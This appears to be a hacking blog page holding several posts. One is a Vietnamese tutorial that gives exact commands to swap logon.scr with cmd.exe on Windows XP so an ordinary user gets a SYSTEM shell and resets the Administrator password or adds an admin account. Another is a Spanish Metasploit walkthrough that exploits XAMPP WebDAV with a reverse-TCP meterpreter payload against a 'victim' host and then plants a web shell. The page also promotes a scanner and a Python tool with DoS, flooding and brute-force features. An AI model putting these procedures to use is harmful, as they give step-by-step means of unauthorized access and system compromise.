 CodeXploiter_Box_Big 
  • Detects common vulnerabilities such as:
    • SQL Injection
    • Cross Site Scripting (XSS)
    • Remote/Local File Inclusion
    • PHP Code Execution
    • Command Execution
    • File Access
    • File Upload
  • Searches for vulnerabilities in user-defined functions
  • Customizable scan options
  • Vulnerabilities are grouped based on file names and vulnerability type
  • Scan single or multiple files
  • Fast scanner
  • Easy to use and user-friendly Graphical User Interface (GUI)

Download Details:
  • Version: 1.0
  • Size: 3.71 MB
  • System Requirements: Microsoft Windows 8, Microsoft Windows 7, Windows Vista, or Windows XP

Xem Thêm

 

Hack mật khẩu Admin trong Windows XP từ User thường

Bạn chỉ được truy cập vào máy tính Windows với một quyền user thông thường và điều đó khiến bạn bực bội mỗi khi cần cài đặt hay sử dụng một chương trình nào đó. Bài hướng dẫn này sẽ giúp bạn giải tỏa bực bội bằng cách “hack chơi” mật khẩu của Admin mà không cần sử dụng tới một phần mềm thứ ba nào cả.

Lưu ý: Cách này không áp dụng được cho ổ đĩa NTFS

- Vào Start > Run gõ lệnh cmd và nhấn Enter. Cửa sổ lệnh sẽ được mở ra và nhập chính xác các câu lệnh sau:

cd\ trở về thư mục gốc

cd\windows\system32 vào thư mục system32

mkdir hackdir tạo thư mục hackdir

copy logon.scr hackdir\logon.scr sao lưu file logon.scr vào thư mục hackdir

copy cmd.exe hackdir\cmd.exe sao lưu file cmd.exe vào thư mục hackdir

del logon.scr xóa file logon.scr gốc

copy hackdir\cmd.exe logon.scr sao lưu file cmd.exe trong thư mục hackdir trở về system32 và đổi tên thành logon.scr

exit đóng cửa sổ lệnh

- Sau đó khởi động lại máy tính.

Với các câu lệnh trên bạn đã thay đổi file chạy giao diện Windows Welcome thông thường bằng lệnh khởi chạy chương trình cửa sổ lệnh Command Prompt với quyền system chứ không phải quyền user nào cả. Do đó tại cửa sổ lệnh này bạn có thể tiến hành thay đổi mật khẩu của tài khoản Admin trên máy.

Sau khi khởi động lại máy tính, thay vì màn hình Welcome bạn sẽ thấy một cửa sổ lệnh hiện ra.

Tại đây bạn có thể tiến hành theo 1 trong 2 cách sau:

Cách 1: Đổi mật khẩu tài khoản Admin sẵn có

Tại cửa sổ lệnh có thể sử dụng một trong các lệnh sau:

net user <username> <new pass> thay mật khẩu tài khoản quản trị bằng mật khẩu mới
hoặc

net user <username> xóa trắng mật khẩu của tài khoản này

Ví dụ: net user Administrator 123 câu lệnh này đổi mật khẩu tài khoản Administrator thành 123.

Cách 2: Thêm một tài khoản mới với quyền Admin

Tại cửa sổ lệnh lần lượt gõ các lệnh sau:

net user <username> <password> /add thêm một tài khoản với tên và mật khẩu tương ứng

net localgroup Administrators <username> /add đưa tài khoản vừa tạo vào nhóm quản trị

Vậy là thông qua 2 cách này, bạn có thể đăng nhập vào tài khoản vừa tạo hoặc sử dụng mật khẩu vừa đổi của tài khoản Administrator để đăng nhập vào máy tính với quyền quản trị mức cao nhất.

Quan trọng: Đừng quên copy các file trong thư mục hackdir trở về thư mục system32 để hệ thống của bạn hoạt động trở lại như bình thường.

Xem Thêm

 

[Metasploit] Hackeando XAMPP Remotamente (Windows XP - 7 - 8)

xampp

------------------------------------------------------------------------------------------------------------------
XAMPP es una forma fácil de instalar la distribución Apache que contiene MySQL, PHP y Perl. XAMPP es realmente simple de instalar y usar - basta descargarlo, extraerlo y comenzar.
La distribución de Windows 2000, 2003, XP, Vista y 7 contiene Apache, MySQL, PHP + PEAR, Perl, mod_php, mod_perl, mod_ssl, OpenSSL, phpMyAdmin, Webalizer, Mercury Mail Transport System for Win32 and NetWare Systems v3.32, Ming, FileZilla FTP Server, mcrypt, eAccelerator, SQLite, and WEB-DAV + mod_auth_mysql.
------------------------------------------------------------------------------------------------------------------


Actualmente el servicio XAMPP, usado por la mayoria de webmasters y usuarios que se dedican a la Programación Web son totalmente vulnerables y se ha creado un modulo en metasploit que explota contraseñas débiles WebDAV en los servidores XAMPP y utiliza credenciales proporcionadas para subir una carga útil de PHP y ejecutarlo. El exploit se encuentra disponible desde XAMPP WebDAV PHP Upload y los pasos para aprovecharse de esta vulnerabilidad, son los siguientes:

REQUERIMIENTOS:

PROCEDIMIENTOS:

Primeramente tenemos que detectar si la PC victima esta ejecutando el servicio XAMPP, para ello usaremos Nmap, ejecutando el siguiente comando:
  • nmap -sS -T4 -A 192.168.1.38
do875e

Si los resultados se muestran tal cual con la imagen de arriba, quiere decir que la PC victima esta ejecutando el servicio XAMPP en el puerto 80 y 443, entonces para aprovecharnos de la vulnerabilidad mencionada lineas arriba, simplemente abriremos metasploit y ejecutamos los siguientes comandos:
-------------------------------------------------------------------------------------------------------------
use exploit/windows/http/xampp_webdav_upload_php
set payload php/meterpreter/reverse_tcp
set Lhost 192.168.1.36 (Nuestra IP)
set RHOST 192.168.1.38 (IP Victima)
exploit
-------------------------------------------------------------------------------------------------------------
21brxmo
Estos comandos haran que se ejecute un payload en php la cual automaticamente se "subira" en el servicio XAMPP de la PC victima.
k9ez9
Seguidamente si todo se realizo correctamente, recibiremos la session meterpreter gracias al payload que metasploit subio al servicio XAMPP vulnerable.
idatcl
Lo demas ya queda a nuestra total disposicion, en este caso podemos subir una web shell ya que XAMPP es un servicio web, por lo que podemos ingresar desde nuestro navegador a la IP vulnerada y ejecutar comandos desde la shell.
Espero les sirva y practiquen :)

Xem Thêm

 

Ck_PyShell

Tool Name: Ck_pyShell

1

Version: 1.1
Release: Beta
Description:
A Multipurpose Tool For Pen-Testing Coded With Python. Uses Various User Agents To Fuzz The Requesting URL for All Purpose. Can Detect Proxy Settings and connect via Proxy Automatically If Any Found! Version 1.1 Has Added Features, Supports Tab Completion Of Commands and More Utilities Programmed.

'color' command has been removed as it does not work with Windows OS Properly

COMPATIBILITY:
Any Windows OS

FEATURES:

1. SQL Injection Vulnerability Scanner
2. XSS Vulnerability Scanner
3. Hash Making and Cracking
4. Admin Login Page Finder
5. Port Scanner
6. LAN DoS Attacker
7. Ping Utility
8. FTP Login Bruteforce
9. Network Scanner For Live Hosts
10. TCP/UDP Flooder
11. BlindSQL Injector [This is Still Being Coded, This Release Can get the Tables And Columns And Database Version]

USAGE:

For "Help" Type Help From The Main Prompt

Download Link: Click Here

Xem Thêm

 

Copyright © Dương-UG Blog's - Nguyễn Bình Dương